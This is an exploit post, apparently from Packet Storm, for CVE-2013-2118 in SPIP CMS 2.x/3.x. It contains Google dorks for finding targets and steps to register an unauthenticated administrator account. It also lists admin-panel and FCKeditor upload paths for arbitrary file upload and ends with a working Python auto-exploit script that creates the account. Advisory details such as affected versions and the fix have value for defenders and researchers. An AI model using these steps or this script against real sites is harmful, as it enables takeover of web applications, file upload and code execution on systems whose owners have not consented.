Lucene search
KingSkrupellosPACKETSTORM:152235HistoryMar 26, 2019 - 12:00 a.m.
SPIP CMS 2.x / 3.x Add Administrator / File Upload
2019-03-2600:00:00
KingSkrupellos
packetstormsecurity.com
344
0.103 Low
EPSS
Percentile
94.4%
`############################################################################################
# Exploit Title : Spip CMS 2.x/3.x Add Administrator Account & Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Published Date : 26/03/2019
# First Discovered Date : 2013 - 2014
# Vendor Homepage : spip.net
# Software Download Links : files.spip.org/spip/archives/
files.spip.net/spip/archives/SPIP-v2-1.16.zip
files.spip.net/spip/archives/SPIP-v2-0-9.zip
files.spip.net/spip/archives/SPIP-v2-1.22.zip
files.spip.net/spip/archives/SPIP-v2-0-23.zip
files.spip.net/spip/archives/SPIP-v3.0.9.zip
# Software Information Link : spip.net/rubrique25.html
# Software Affected Versions :
Spip 2.x - 3.x - 3.0.9 / 2.0.0 - 2.0.10 -
2.0.20 - 2.1.5 - 2.1.22 / 2.0.23 - 2.1.15
3.0.0 - 3.0.1 - 3.0.x - All Spip CMS 2.x - 3.x Version
# Solution : Update/Upgrade to Higher Version to 3.1.0 and higher
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks :
inurl:/spip.php?rubrique site:fr
inurl:/spip.php?article site:fr
# CVE : cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2118
cvedetails.com/cve/CVE-2013-2118/
# Vulnerability Type : CWE-286 [ Incorrect User Management ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Cyberizm.Org Reference Link :
cyberizm.org/cyberizm-spip-cms-2-0-admin-panele-erisim-acigi.html
############################################################################################
# Description about Software :
***************************
SPIP is a free software content management system. SPIP is a publishing system for the Internet in which great importance is a
ttached to collaborative working, to multilingual environments, and to simplicity of use for web authors.
It is free software, distributed under the GNU/GPL licence. This means that it can be used for any Internet site, whether personal
or institutional, non-profit or commercial. SPIP is developed (programmed, documented, translated, etc.) and used by a community
in which there is an open invitation to participate.
############################################################################################
# According to the CVE-2013-2118 :
********************************
SPIP 3.0.x before 3.0.9, 2.1.x before 2.1.22, and 2.0.x before 2.0.23 allows remote
attackers to gain privileges and "take editorial control" via vectors related to ecrire/inc/filtres.php.
############################################################################################
# Impact :
***********
The software SPIP 2.x/3.x does not properly manage a user within its environment.
This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.
Users can be assigned to the wrong group class of permissions resulting in unintended access rights to sensitive objects.
Spip 2.x/3.x is prone to an arbitrary file-upload vulnerability. An attacker may leverage this issue to upload arbitrary
files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
############################################################################################
# Vulnerable File Source Code : [ filtres.php ]
***************************************
File => /ecrire/inc/filtres.php
core.spip.net/projects/spip/repository/revisions/20541/entry/branches/spip-2.1/ecrire/inc/filtres.php
# Vulnerability :
**************
Add New Administrator/Author Account
/spip.php?page=identifiants&mode=0minirezo
It says : "Vous inscrire sur ce site " means " Register to this Site.
After Registration - it says :
Votre nouvel identifiant vient de vous Γͺtre envoyΓ© par email.
Your new login details has just been sent to you by email.
Register yourself - Give a Random Nickname and Your Real E-Mail Address.
The System will send you automatically a password for Admin/Author Login.
There is Auto Exploiter down. You can use this.
# Admin Panel Login Path :
************************
/ecrire
/spip.php?page=login&url=%2Fecrire%2F
/?page=login&lang=fr
# Useable Admin Control Panel URL Links :
***************************************
/ecrire/?exec=accueil
/ecrire/?bonjour=oui
/ecrire/?exec=rubrique_edit&new=oui
/ecrire/?exec=rubriques_edit&new=oui
/IMG/html/....
/IMG/txt/...
/IMG/jpg/...
/IMG/gif/..
/IMG/png/...
/ecrire/?exec=recherche
/ecrire/?exec=articles
/ecrire/?exec=article_edit&new=oui
/ecrire/?exec=articles_edit&new=oui
/ecrire/?exec=article&id_article=[ID-NUMBER]
/ecrire/?exec=articles&id_article=[ID-NUMBER]
/ecrire/?exec=articles_edit&id_article=[ID-NUMBER]
/ecrire/?exec=naviguer&id_rubrique=[ID-NUMBER]
/ecrire/?exec=rubriques_edit&id_rubrique=[ID-NUMBER]&retour=nav
/ecrire/?exec=rubriques_edit&new=oui&id_parent=[ID-NUMBER]
/ecrire/?exec=mot_edit&new=oui
/ecrire/?exec=site_edit&new=oui
/ecrire/?exec=breve_edit&new=oui
/ecrire/?exec=breve_edit&new=oui&id_rubrique=[ID-NUMBER]
/ecrire/?exec=auteurs
/ecrire/?exec=auteur_edit&new=oui
/ecrire/?exec=auteurs&statut=0minirezo
/ecrire/?exec=auteur_edit&id_auteur=[AUTHOR-ID-NUMBER]
/ecrire/?exec=auteurs&statut=1comite
/ecrire/?exec=auteur&id_auteur=[ID-NUMBER]
/ecrire/?exec=message_edit&new=oui&to=[ID-NUMBER]&redirect=.%2F%3Fexec%3Dauteur%26amp%3Bid_auteur%3D[ID-NUMBER]
/ecrire/?exec=auteurs&statut=!0minirezo,1comite,5poubelle
/ecrire/?exec=statistiques_referers
/ecrire/?exec=rubriques
/ecrire/?exec=rubrique&id_rubrique=[ID-NUMBER]
/ecrire/?exec=rubrique_edit&id_rubrique=[ID-NUMBER]
/ecrire/?exec=article_edit&id_article=[ID-NUMBER]
/ecrire/?exec=brouteur
/ecrire/?exec=clevermail
/ecrire/?exec=clevermail_lists
/ecrire/?exec=clevermail_list_edit&lst_id=-1
/ecrire/?exec=clevermail_subscribers
/ecrire/?exec=clevermail_subscriber_new
/ecrire/?exec=clevermail_settings_edit
/ecrire/?exec=forum
/ecrire/?exec=forum&repondre=[ID-NUMBER]
/ecrire/?exec=calendrier
/ecrire/?exec=messages
/ecrire/?exec=message&id_message=[ID-NUMBER]
/ecrire/?exec=message_edit&id_message=[ID-NUMBER]
/ecrire/?exec=documents
/ecrire/?exec=document_edit&id_document=[ID-NUMBER]
/ecrire/?exec=documents&statut=publie
/ecrire/?exec=documents&statut=publie&media=image
/ecrire/?exec=documents&statut=publie&media=audio
/ecrire/?exec=documents&statut=publie&media=video
/ecrire/?exec=documents&statut=publie&media=file
/ecrire/?exec=documents&media=file&statut=publie
/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle
/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=oui
/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non
/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non&orphelins=1
/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non&brise=1
/ecrire/?exec=documents&statut=publie&media=file&extension=html&ajouter=oui
/ecrire/?exec=mots
/ecrire/?exec=groupe_mots_edit&id_groupe=[ID-NUMBER]
/ecrire/?exec=mot_edit&new=oui&id_groupe=[ID-NUMBER]&redirect=.%2F%3Fexec%3Dmots
/ecrire/?exec=sites
/ecrire/?exec=site&id_syndic=[ID-NUMBER]
/ecrire/?exec=site_edit&id_syndic=[ID-NUMBER]
/ecrire/?exec=breves
/ecrire/?exec=breve&id_breve=[ID-NUMBER]
/ecrire/?exec=breve_edit&id_breve=[ID-NUMBER]
/ecrire/?exec=message&id_message=[ID-NUMBER]
/ecrire/?exec=message_edit&id_message=[ID-NUMBER]
/ecrire/?exec=revision&id_objet=[ID-NUMBER]&objet=article&id_version=[ID-NUMBER]
/ecrire/?exec=article_edit&id_article=[ID-NUMBER]
/ecrire/?exec=infos_perso
/spip.php?auteur[ID-NUMBER]&var_mode=preview
/ecrire/?exec=visiteurs
/ecrire/?exec=suivi_edito
/ecrire/?exec=article&id_article=[ID-NUMBER]
/ecrire/?exec=article_edit&id_article=[ID-NUMBER]
/ecrire/?exec=synchro
/ecrire/?exec=revisions
/ecrire/?exec=revision&id_objet=[ID-NUMBER]&objet=article&id_version=[ID-NUMBER]
/ecrire/?exec=article_edit&id_article=[ID-NUMBER]
/ecrire/?exec=controler_forum
/ecrire/?exec=controler_forum&type_message=interne
/ecrire/?exec=controler_forum&type_message=vide
/ecrire/?exec=stats_visites
/ecrire/?exec=stats_referers
/ecrire/?exec=stats_repartition
/ecrire/?exec=stats_lang
/ecrire/?exec=navigation&menu=menu_squelette
/ecrire/?exec=configurer_mediabox
/ecrire/?exec=zengarden
/ecrire/?exec=configurer_sarkaspip&cfg=accueil
/ecrire/?exec=admin_vider
/ecrire/?exec=sauvegarder
/ecrire/?exec=restaurer
/ecrire/?exec=admin_tech
/ecrire/?exec=job_queue
/ecrire/?exec=configurer_identite
/local/cache-vignettes/.......
/IMG/png/....
/IMG/gif/.....
/IMG/jpg/....
/ecrire/?exec=configurer_langue
/ecrire/?exec=config_lang
/ecrire/?exec=admin_tech
/ecrire/?exec=admin_vider
/ecrire/?exec=admin_plugin
/ecrire/?exec=cfg
/ecrire/?exec=configurer_multilang
/ecrire/?exec=configurer_contenu
/ecrire/?exec=configurer_interactions
/ecrire/?exec=configurer_avancees
/ecrire/?exec=admin_plugin
/ecrire/?exec=admin_plugin&voir=tous
/ecrire/?exec=admin_plugin&voir=actif
/ecrire/?exec=admin_plugin&voir=inactif
/ecrire/?exec=admin_plugin&voir=inactif&verrouille=tous
/ecrire/?exec=admin_plugin&voir=inactif&verrouille=non
/ecrire/?exec=configurer_forum
/ecrire/?exec=configurer_revisions
/ecrire/?exec=configurer_urls
/ecrire/?exec=charger_plugin
/ecrire/?exec=rubriques
/ecrire/?exec=articles
/ecrire/?exec=documents
/ecrire/?exec=navigation&menu=menu_edition
/ecrire/?exec=navigation&menu=menu_administration
/ecrire/?exec=navigation&menu=menu_configuration
/ecrire/?exec=configuration
/ecrire/?exec=config_identite
/ecrire/?exec=recherche&recherche=
/spip.php?page=distrib
/spip.php?article[ID-NUMBER]&lang=fr
/ecrire/?exec=aide_index&var_lang=en
# Arbitrary File Upload / Insert File Exploit :
****************************************
/plugins/fckeditor-spip-2/fckeditor/editor/filemanager/connectors/uploadtest.html
/plugins/auto/fckeditor-spip-2/fckeditor/editor/filemanager/connectors/uploadtest.html
/plugins/fckeditor-spip-2-4/fckeditor/editor/filemanager/connectors/uploadtest.html
/userfiles/....
/UserFiles/...
/ecrire/?exec=article_edit&new=oui
/ecrire/?exec=articles_edit&new=oui
/IMG/html/[YOURFILENAME].html .jpg gif .png .txt
/local/cache-vignettes/.......
/IMG/png/....
/IMG/gif/.....
/IMG/jpg/....
# Python Auto Exploiter :
***********************
import urllib, urllib2
import cookielib
import sys
import re
def send_request(urlOpener, url, post_data=None):
request = urllib2.Request(url)
url = urlOpener.open(request, post_data)
return url.read()
if len(sys.argv) < 4:
print "SPIP < 3.x - 2.x - 3.0.9 / 2.1.22 / 2.0.23 exploit by KingSkrupellos Cyberizm Digital Security Team\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
exit()
base_url = sys.argv[1]
login = sys.argv[2]
mail = sys.argv[3]
cookiejar = cookielib.CookieJar()
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
print "[+] First request sended..."
m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)
m = re.search("(?<=value=')[\w\+/=]*",m.group(0));
formulaire_data = {'var_ajax' : 'form',
'page' : 'identifiants',
'mode' : '0minirezo',
'formulaire_action' : 'inscription',
'formulaire_action_args' : m.group(0),
'nom_inscription' : login,
'mail_inscription' : mail,
'nobot' : ''
}
formulaire_data = urllib.urlencode(formulaire_data)
send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
print "[+] Second request sended"
print "[+] You should receive an email with credentials soon :) "
############################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################################################
`
Related
prion
prion
Design/Logic Flaw
2013-07-09 17:55:00
cve
cve
CVE-2013-2118
2013-07-09 17:55:00
seebug
seebug
SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation
2014-07-01 00:00:00
openvas
openvas
Debian Security Advisory DSA 2694-1 (spip - privilege escalation)
2013-05-26 00:00:00
Debian: Security Advisory (DSA-2694-1)
2013-05-25 00:00:00
cvelist
cvelist
CVE-2013-2118
2022-10-03 16:15:01
exploitpack
exploitpack
SPIP CMS 2.0.23 2.1.223.0.9 - Privilege Escalation
2014-05-19 00:00:00
debiancve
debiancve
CVE-2013-2118
2013-07-09 17:55:00
nessus
nessus
Debian DSA-2694-1 : spip - privilege escalation
2013-05-28 00:00:00
ubuntucve
ubuntucve
CVE-2013-2118
2013-07-09 00:00:00
exploitdb
exploitdb
SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation
2014-05-19 00:00:00